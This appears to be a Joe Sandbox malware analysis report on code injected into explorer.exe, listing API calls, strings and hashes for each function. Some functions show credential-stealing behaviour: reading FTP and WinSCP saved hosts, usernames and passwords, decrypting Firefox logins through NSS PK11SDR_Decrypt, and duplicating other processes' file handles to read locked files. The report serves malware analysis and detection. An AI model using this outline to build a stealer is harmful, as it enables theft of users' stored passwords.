
Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 70920286b436b901930686db3936875f3a8fc1b44731536fe55b029e8dfd6e58
Instruction ID: 76735ebc0d0c4162b15f9817b5c381b37576026eee02975f33abd8d6089a69c2
Opcode Fuzzy Hash: 70920286b436b901930686db3936875f3a8fc1b44731536fe55b029e8dfd6e58
Instruction Fuzzy Hash: 41A001B5950218BBFE456BA4AE0EA1A3A28FB84703F10C544B646860A2EAA854049B39

Function 006E12A3 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

RtlZeroMemory.NTDLL(?,00000018), ref: 006E12B5

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: MemoryZero
String ID:
API String ID: 816449071-0
Opcode ID: 73fff808a7405f70e0adfe29e45490aa987174eddeb2751d28b4c408b45d7ad2
Instruction ID: bff266b48fefe0c630a2d1b0af62c9bd6a87112a4dbd6bda712cef1c54e9d8e5
Opcode Fuzzy Hash: 73fff808a7405f70e0adfe29e45490aa987174eddeb2751d28b4c408b45d7ad2
Instruction Fuzzy Hash: CF11E6B5A01209AFEB10DFA5D984ABEB7BDFB09341B108029F945E7240D734DA01DB64

Function 006E1B9D Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000000,00000000,006E2C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 006E1BAA

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e2efe7c1302bcf97ac431132d47693c5752250dbe6ec1189d0e3aff4d8ee3fdc
Instruction ID: 9771573832aba41ec76042570189f468f428eca2afcab35a9781809d5e5f5032
Opcode Fuzzy Hash: e2efe7c1302bcf97ac431132d47693c5752250dbe6ec1189d0e3aff4d8ee3fdc
Instruction Fuzzy Hash: D9D0A933E13630829A68163938448D2A2816A0267531A03B4FC26FF2D4E238CC8262C0

Function 006E1677 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 006E1684

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: a0e81929d5e50fff4f12e4ec26d3993c506ec895342ecaa4c88d8afa692b1417
Instruction ID: 3a56bee5620a5f57e51c8b712e4392a3f14b8f3beb944594e3b3e1fe256b2891
Opcode Fuzzy Hash: a0e81929d5e50fff4f12e4ec26d3993c506ec895342ecaa4c88d8afa692b1417
Instruction Fuzzy Hash: 59C01230121221AFE7201A208C09B8626D5AF1ABA2F064929A4819D080E2B808C08A90

Function 006E104C Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,006E158A), ref: 006E1056

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 05bc074f78993714a1c1bc807ddc6f14387db549982bdd491d9c0d8a2b6acf2f
Instruction ID: a8ad047c59450eba897f180682c82bdc88a7dd561772a6c0a563e8191ce9318e
Opcode Fuzzy Hash: 05bc074f78993714a1c1bc807ddc6f14387db549982bdd491d9c0d8a2b6acf2f
Instruction Fuzzy Hash: 8FA001B07952007AFD695762AE1BF2529289740B02F108244B349680D055E86500852D

Function 006E105D Relevance: 1.3, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,006E4A5B,?,?,00000000,?,?,?,?,006E4B66,?), ref: 006E1065

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 929065f3e2bdb095b2cc42db64c72e5892c9c904f0e35c51527a2c9638fe0686
Instruction ID: 21dfd0fe5bd314d5608565644816400ed58278f39ec8a04d53c8dcbfa00605bc
Opcode Fuzzy Hash: 929065f3e2bdb095b2cc42db64c72e5892c9c904f0e35c51527a2c9638fe0686
Instruction Fuzzy Hash: CCA0027069071476FDB557205D0AF0526246740B02F20C5447241A90D159E9E0448A1C

Non-executed Functions

Function 006E349B Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 201nativefilestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 006E34C0

Part of subcall function 006E33C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 006E3401

OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,006E37A8), ref: 006E34E9

Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A

NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 006E351E
NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 006E3541
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 006E3586
DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 006E358F
lstrcmpiW.KERNEL32(00000000,File), ref: 006E35B6
NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 006E35DE
StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 006E35F6
StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 006E3606
lstrcmpiW.KERNEL32(00000000,00000000), ref: 006E361E
GetFileSize.KERNEL32(?,00000000), ref: 006E3631
SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 006E3658
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 006E366B
ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 006E3681
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 006E36AD
CloseHandle.KERNEL32(?), ref: 006E36C0
CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,006E37A8), ref: 006E36F5

Part of subcall function 006E1C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 006E1CC0
Part of subcall function 006E1C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 006E1CDA
Part of subcall function 006E1C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 006E1CE6

CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,006E37A8), ref: 006E3707

Strings

File, xrefs: 006E35B0

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
String ID: File
API String ID: 3915112439-749574446
Opcode ID: 0c2e5c26542a9848aecbf316cbba0d682acd48d6cad62509079594dc6a7722dc
Instruction ID: f89c34db9878d42654fc7fc2ed1407161eae6a6a1ddba52350c657176e66e70e
Opcode Fuzzy Hash: 0c2e5c26542a9848aecbf316cbba0d682acd48d6cad62509079594dc6a7722dc
Instruction Fuzzy Hash: 1C61BB70205390BFE710AF32CC89F6B7BEAAB84751F00482CF946973A1DB35DA448B59

Function 00734438 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 359COMMON

Download Yara Rule

APIs

memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 00734502
memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 0073475F
memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00734803

Strings

file, xrefs: 00734474
cache, xrefs: 007346FA
invalid uri authority: %.*s, xrefs: 00734513
access, xrefs: 00734725
mode, xrefs: 00734712
no such %s mode: %s, xrefs: 00734784
cach, xrefs: 007346DC
localhost, xrefs: 007344FD
%s mode not allowed: %s, xrefs: 007347D0
no such vfs: %s, xrefs: 0073482F

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: memcmp$memcpy
String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
API String ID: 231171946-1096842476
Opcode ID: a82fa210f8cbe65db06c223542e46135903511ec57d4172825ba7b87502dd98f
Instruction ID: 56189b224c6a5352f319822cd72017ad72dcacd26b51122aa7077b15e709d848
Opcode Fuzzy Hash: a82fa210f8cbe65db06c223542e46135903511ec57d4172825ba7b87502dd98f
Instruction Fuzzy Hash: 67C10070A083919BFB3CCE18849277AB7E1AB9A314F14092EE8D587253D73DFC458B56

Function 00705F08 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 328COMMON

Download Yara Rule

APIs

Part of subcall function 006E6AAA: memset.NTDLL ref: 006E6AC5

memset.NTDLL ref: 00705F53

Strings

foreign key, xrefs: 007060A3
indexed, xrefs: 007060E8
no such column: "%s", xrefs: 00706271
cannot open virtual table: %s, xrefs: 00705FAA
cannot open view: %s, xrefs: 00705FF3
cannot open %s column for writing, xrefs: 00706255
cannot open table without rowid: %s, xrefs: 00705FCF

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: memset
String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
API String ID: 2221118986-594550510
Opcode ID: 9496b5a801818717d354a6476ab6ebfed498d952a861f0d9c50176ed6e24fe8b
Instruction ID: 69b19b5e2bce637633379bdedde932b945d3c6676f05a711e3b531b17b4605c0
Opcode Fuzzy Hash: 9496b5a801818717d354a6476ab6ebfed498d952a861f0d9c50176ed6e24fe8b
Instruction Fuzzy Hash: CEC17070604742DFDB54DF25C490A2BB7E2BF88710F148A2DF84587282D739E962CB96

Function 006E4440 Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 289stringcommemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(007362B0,00000000,00000001,007362A0,?), ref: 006E445F
SysAllocString.OLEAUT32(?), ref: 006E44AA
lstrcmpiW.KERNEL32(RecentServers,?), ref: 006E456E
lstrcmpiW.KERNEL32(Servers,?), ref: 006E457D
lstrcmpiW.KERNEL32(Settings,?), ref: 006E458C

Part of subcall function 006E11E1: lstrlenW.KERNEL32(?,7591F360,00000000,?,00000000,?,006E46E3), ref: 006E11ED
Part of subcall function 006E11E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 006E120F
Part of subcall function 006E11E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 006E1231

lstrcmpiW.KERNEL32(Server,?), ref: 006E45BE
lstrcmpiW.KERNEL32(LastServer,?), ref: 006E45CD
lstrcmpiW.KERNEL32(Host,?), ref: 006E4657
lstrcmpiW.KERNEL32(Port,?), ref: 006E4679
lstrcmpiW.KERNEL32(User,?), ref: 006E469F
lstrcmpiW.KERNEL32(Pass,?), ref: 006E46C5
wsprintfW.USER32 ref: 006E471E

Strings

Port, xrefs: 006E4674
LastServer, xrefs: 006E45C8
Settings, xrefs: 006E4587
Servers, xrefs: 006E4578
Server, xrefs: 006E45B9
RecentServers, xrefs: 006E4569
Pass, xrefs: 006E46C0
%s:%s, xrefs: 006E4718
User, xrefs: 006E469A
Host, xrefs: 006E4652

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
API String ID: 2230072276-1234691226
Opcode ID: 55e60d25791b779836481ce357b8be105076c764788959624c07bd445c02bcff
Instruction ID: 752b18beacb7af9d944e44b760ab654b86e174f783e1da89c01fc2622c6d34f9
Opcode Fuzzy Hash: 55e60d25791b779836481ce357b8be105076c764788959624c07bd445c02bcff
Instruction Fuzzy Hash: 1CB12971205342AFDB00DF65C884E6AB7EAEFC9745F00896CF5858B260DB71EC06CB62

Function 006E24B0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A

Part of subcall function 006E1090: lstrlenW.KERNEL32(?,?,00000000,006E17E5), ref: 006E1097
Part of subcall function 006E1090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 006E10A8

Part of subcall function 006E19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,006E2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 006E19C4

GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 006E2503
SetCurrentDirectoryW.KERNEL32(00000000), ref: 006E250A
LoadLibraryW.KERNEL32(00000000), ref: 006E2563
SetCurrentDirectoryW.KERNEL32(?), ref: 006E2570
GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 006E2591
GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 006E259E
GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 006E25AB
GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 006E25B8
GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 006E25C5
GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 006E25D2
GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 006E25DF

Part of subcall function 006E190B: lstrlen.KERNEL32(?,?,?,?,00000000,006E2783), ref: 006E192B
Part of subcall function 006E190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,006E2783), ref: 006E1930
Part of subcall function 006E190B: lstrcat.KERNEL32(00000000,?), ref: 006E1946
Part of subcall function 006E190B: lstrcat.KERNEL32(00000000,00000000), ref: 006E194A

Strings

NSS_Shutdown, xrefs: 006E2593
PK11SDR_Decrypt, xrefs: 006E25C7
PK11_GetInternalKeySlot, xrefs: 006E25AD
PK11_FreeSlot, xrefs: 006E25D4
NSS_Init, xrefs: 006E258B
PK11_Authenticate, xrefs: 006E25BA
nss3.dll, xrefs: 006E2510
SECITEM_FreeItem, xrefs: 006E25A0
sql:, xrefs: 006E262B

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
API String ID: 3366569387-3272982511
Opcode ID: c301cdd37c39899d19b31d6cd78933088f9815a4e9a0b240d17b9c0d9b5fd72f
Instruction ID: fc70fd4dc01bb81dad43a34b533080e241536133dc265b7a7befb71fe51581e7
Opcode Fuzzy Hash: c301cdd37c39899d19b31d6cd78933088f9815a4e9a0b240d17b9c0d9b5fd72f
Instruction Fuzzy Hash: 30411535A033829BDB14BB369C7546E3BEBAB82745740812EE84197352DF3C8C4B9B59

Function 006E5E5A Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 382COMMON

Download Yara Rule

APIs

Part of subcall function 006E5BF5: memset.NTDLL ref: 006E5C07

_alldiv.NTDLL(?,?,05265C00,00000000), ref: 006E60E1
_allrem.NTDLL(00000000,?,00000007,00000000), ref: 006E60EC
_alldiv.NTDLL(?,?,000003E8,00000000), ref: 006E6113
_alldiv.NTDLL(?,?,05265C00,00000000), ref: 006E618E
_alldiv.NTDLL(?,?,05265C00,00000000), ref: 006E61B5
_allrem.NTDLL(00000000,?,00000007,00000000), ref: 006E61C1

Strings

%.16g, xrefs: 006E6077
%02d, xrefs: 006E6039, 006E61D3
W, xrefs: 006E6193
%06.3f, xrefs: 006E6229
%04d, xrefs: 006E6016
%lld, xrefs: 006E6122
%03d, xrefs: 006E61F3

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: _alldiv$_allrem$memset
String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
API String ID: 2557048445-1989508764
Opcode ID: 425bfb2d002144dfe644435cd9f462f588aaf14e7576333688ff0f83492614ac
Instruction ID: 6da1e28fec3dcdb8bde67651e343138389a8209e9db68674f50a5fcb3bf78e00
Opcode Fuzzy Hash: 425bfb2d002144dfe644435cd9f462f588aaf14e7576333688ff0f83492614ac
Instruction Fuzzy Hash: 27B1BFB29097C29FD7359E26CC88B7A7FC7FB90388F24054DF583962D2E620CE108695

Function 006FD2AC Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 169COMMON

Download Yara Rule

APIs

memcmp.NTDLL(0073637A,BINARY,00000007), ref: 006FD324

Strings

BINARY, xrefs: 006FD31E
%.16g, xrefs: 006FD3E5
,%d, xrefs: 006FD444
k(%d, xrefs: 006FD2EE
%s(%d), xrefs: 006FD3AB
,%s%s, xrefs: 006FD34E
(blob), xrefs: 006FD416
vtab:%p, xrefs: 006FD423
(%.20s), xrefs: 006FD38A
%lld, xrefs: 006FD3CA
NULL, xrefs: 006FD40F
program, xrefs: 006FD46A

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: memcmp
String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
API String ID: 1475443563-3683840195
Opcode ID: f51fc25ff32f6cd88df5f63a6e63c489e9a2954422e8fb2e8022ccc7fd9ba1a2
Instruction ID: e1fecfaddbf6c7103f3026cde73cf03c41e6f48f0ac518c353333e77b3447e05
Opcode Fuzzy Hash: f51fc25ff32f6cd88df5f63a6e63c489e9a2954422e8fb2e8022ccc7fd9ba1a2
Instruction Fuzzy Hash: 29510372608308ABE721DF55CC41A7A73E7AF46300F140869FA918B242D775FD16CB93

Function 006E48B1 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 006E19E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1A1E
Part of subcall function 006E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 006E1A3C
Part of subcall function 006E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 006E1A75
Part of subcall function 006E19E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1A98

Part of subcall function 006E482C: lstrlenW.KERNEL32(?), ref: 006E4845
Part of subcall function 006E482C: lstrlenW.KERNEL32(?), ref: 006E488F
Part of subcall function 006E482C: lstrlenW.KERNEL32(?), ref: 006E4897

wsprintfW.USER32 ref: 006E49A7
wsprintfW.USER32 ref: 006E49B9

Strings

%s:%u, xrefs: 006E4971, 006E49B7
RemoteDirectory, xrefs: 006E48F8
HostName, xrefs: 006E48C4
Password, xrefs: 006E48E4
UserName, xrefs: 006E48D2
%s:%u/%s, xrefs: 006E4982, 006E49A5

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: lstrlen$QueryValuewsprintf$CloseOpen
String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
API String ID: 2889301010-4273187114
Opcode ID: 7331516abf0932cc218a9a96ceb539fa0ea7201955e464ff00711eec8e923da7
Instruction ID: 6c2c45b3addf72ecff6546582cca52bc63ade4784a4458aec1d6fbfb0a58c91a
Opcode Fuzzy Hash: 7331516abf0932cc218a9a96ceb539fa0ea7201955e464ff00711eec8e923da7
Instruction Fuzzy Hash: 9A31E2757063846BD710AB77884182BB7EFEFCA744B05891DB045AB342DEB2DD0187A5

Function 006EF92F Relevance: 12.4, APIs: 4, Strings: 4, Instructions: 350COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?,?,00000000), ref: 006EFB32
memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 006EFB4D
memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 006EFB60
memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 006EFB95

Strings

-wal, xrefs: 006EFBA9
nolock, xrefs: 006EFC4E
immutable, xrefs: 006EFC68
-journal, xrefs: 006EFB6B

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: memcpy
String ID: -journal$-wal$immutable$nolock
API String ID: 3510742995-3408036318
Opcode ID: d2b15c290399097151cd02ad6831562b5d78c3e2acf78ea6a1d6d15a767ea57e
Instruction ID: 0f4ef44b1d53deba1add63c37fafc8b28ee81f099c0767b11724034ab48bd919
Opcode Fuzzy Hash: d2b15c290399097151cd02ad6831562b5d78c3e2acf78ea6a1d6d15a767ea57e
Instruction Fuzzy Hash: BFD1E3B16093818FDB14DF29C881B5BBBE2AF95310F18457DF8998B382DB75D805CB52

Function 006E7820 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 407COMMON

Download Yara Rule

Strings

-x0, xrefs: 006E7325
%, xrefs: 006E7822
NaN, xrefs: 006E73F8

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID:
String ID: %$-x0$NaN
API String ID: 0-62881354
Opcode ID: e0a6134bcd557dd39cbad41fcaac0ae5cc3eeed551eff9e6871bb74401e41b20
Instruction ID: a134d537289ad810c9f8672f7c01e4b2adbc0af138b0ec63c8dd18778dafe95e
Opcode Fuzzy Hash: e0a6134bcd557dd39cbad41fcaac0ae5cc3eeed551eff9e6871bb74401e41b20
Instruction Fuzzy Hash: BFD1F57060E3D28FD7258E2AC4947AABBE3AF95344F28485DF8C187392D664CD46D782

Function 006E1895 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetHGlobalFromStream.COMBASE(?,?), ref: 006E18A7
GlobalLock.KERNEL32(WKn), ref: 006E18B6
GlobalUnlock.KERNEL32(?), ref: 006E18F4

Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A

RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 006E18E8

Strings

WKn, xrefs: 006E18CA
WKn, xrefs: 006E18B2

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
String ID: WKn$WKn
API String ID: 1688112647-3349668105
Opcode ID: ad4f917900dfe66d5b2753c7700d40e6c77de9714fa6e55116573476ef703178
Instruction ID: f7baee02657895591a1dfaaf22771b937e2ed1bea0f7b93c142f9792bb4b09b5
Opcode Fuzzy Hash: ad4f917900dfe66d5b2753c7700d40e6c77de9714fa6e55116573476ef703178
Instruction Fuzzy Hash: 6801A271201349AF9B015F269C1889F7BAAEF85351B10C42EF5118B210DF35C904AA24

Function 006E78B0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 441COMMON

Download Yara Rule

Strings

-x0, xrefs: 006E7325
NaN, xrefs: 006E73F8

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: f6cb62e0589dd7f7a25f3b45e8f479b602919c308eee84da45930534cb0fa847
Instruction ID: aabf9f1168faed6761f622bee0be3ea8f6d493c65d34c1e980bf332ed2cb8008
Opcode Fuzzy Hash: f6cb62e0589dd7f7a25f3b45e8f479b602919c308eee84da45930534cb0fa847
Instruction Fuzzy Hash: FBE1F57060E3C28FD7258E2AC4547ABBBE3AFA5344F28496DF8C187392D664CD46D742

Function 006E7A5C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 431COMMON

Download Yara Rule

Strings

-x0, xrefs: 006E7325
NaN, xrefs: 006E73F8

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: ba5d73f00a8a4a5a7f169cb442de85f79ed7b6e61d0dbda6a409ea5fdf1e3986
Instruction ID: c96525260237899a3e13c70eba24a3369950b38a84fdc23fecd158c141e35df2
Opcode Fuzzy Hash: ba5d73f00a8a4a5a7f169cb442de85f79ed7b6e61d0dbda6a409ea5fdf1e3986
Instruction Fuzzy Hash: F2E1F27060E3C28FD725CE2AC4947AABBE3AF95344F28486DF8C187392D664CD45D792

Function 006E7A28 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 426COMMON

Download Yara Rule

Strings

-x0, xrefs: 006E7325
NaN, xrefs: 006E73F8

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: 036612c81b4478db22cf8f0e6c9e9951a007088a41807efa8ac43b4323a8a8c4
Instruction ID: ec281607c90a6a558095730fe10672d2711223f3066d56633e291bcb9bd19f62
Opcode Fuzzy Hash: 036612c81b4478db22cf8f0e6c9e9951a007088a41807efa8ac43b4323a8a8c4
Instruction Fuzzy Hash: FDE1D27060E3C28FD725CE2AC4947AABBE3AF95344F28496DF8C187392D664CD45D782

Function 006E77F9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 414COMMON

Download Yara Rule

Strings

-x0, xrefs: 006E7325
NaN, xrefs: 006E73F8

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

